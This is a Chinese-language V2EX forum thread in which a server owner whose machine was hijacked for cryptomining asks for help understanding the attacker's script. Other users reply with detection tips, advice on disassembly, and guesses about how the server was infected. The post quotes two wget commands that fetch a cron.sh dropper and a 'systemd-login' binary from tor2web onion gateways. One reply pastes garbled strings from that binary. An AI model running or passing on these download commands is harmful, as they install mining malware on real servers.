首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
V2EX  ›  Linux

服务器被挖矿,麻烦帮我看看脚本

  •  
  •   wangking · 92 天前 · 3230 次点击
    这是一个创建于 92 天前的主题,其中的信息可能已经有所发展或是发生改变。

    wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh

    能看懂中间是 base64 加密,开头和结尾是什么?

    第 1 条附言  ·  92 天前
    最终找到二进制文件,不会看里面的内容。
    wget -t1 -T180 -qU- --no-check-certificate aptgetgxqs3secda.tor2web.io/systemd-login -O test
    第 2 条附言  ·  92 天前
    由于二进制文件不好搞,现在的暂时解决办法是,把域名解析改掉
    14 回复  |  直到 2019-07-16 10:13:03 +08:00
        1
    bumz   92 天前 via iPhone
    tor2web

    隐藏的还挺好
        2
    AllenBigBear   92 天前
    萌新请教,怎么发现服务器被挖矿的哈?
        3
    15651980765   92 天前
    @AllenBigBear = =服务商会发短信告诉你你的服务器 CPU 运行异常,长时间冲高。
        4
    wangking   92 天前
    @AllenBigBear 我们是监控报的,上来看,发现有异常进程
        5
    wangking   92 天前
    @bumz 这个开头和结尾是什么鬼,大佬了解吗
        6
    AllenBigBear   92 天前
    @15651980765 哦哦,好的,谢谢!
        7
    shinodajmk   92 天前
    服务器挖矿,这收益率是很低的。CPU 扛矿。除非你是 GPU 型机子,很棒帮
        8
    dlsflh   92 天前 via Android
    @shinodajmk 你要不去看一下 XMR ?
        9
    defunct9   92 天前
    s.bsst
    6!8-
    #[email protected]>
    cp -pf /H
    tmp/.00 CE
    /lib/sys!emd !
    -log!in6r
    ; toucpxhd
        10
    defunct9   92 天前
    这是个前置的,一旦运行估计就开始下东西。安装,运行
        11
    wangking   92 天前
    @defunct9 找了个编辑器,打开就是这一堆的东西,看不懂。,
        12
    moonfly   92 天前 via iPhone
    二进制程序要反汇编,拖到 IDA 里看看,没加密混淆的话,应该能看出大致的程序运行逻辑,如果确定是挖矿木马,那就没啥分析的价值了!顶多学学它的自启动脚本怎么写的!

    话说服务器被挖矿,第一件事情不是应该查是如何被挂的马吗?
        13
    nnnToTnnn   91 天前
    @moonfly 可能是破解的 xshell,或者是在非官网下载又不验证 hash 值
        14
    wangking   91 天前
    @moonfly 可能是历史遗留原因。
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2590 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 25ms · UTC 14:30 · PVG 22:30 · LAX 07:30 · JFK 10:30
    ♥ Do have faith in what you're doing.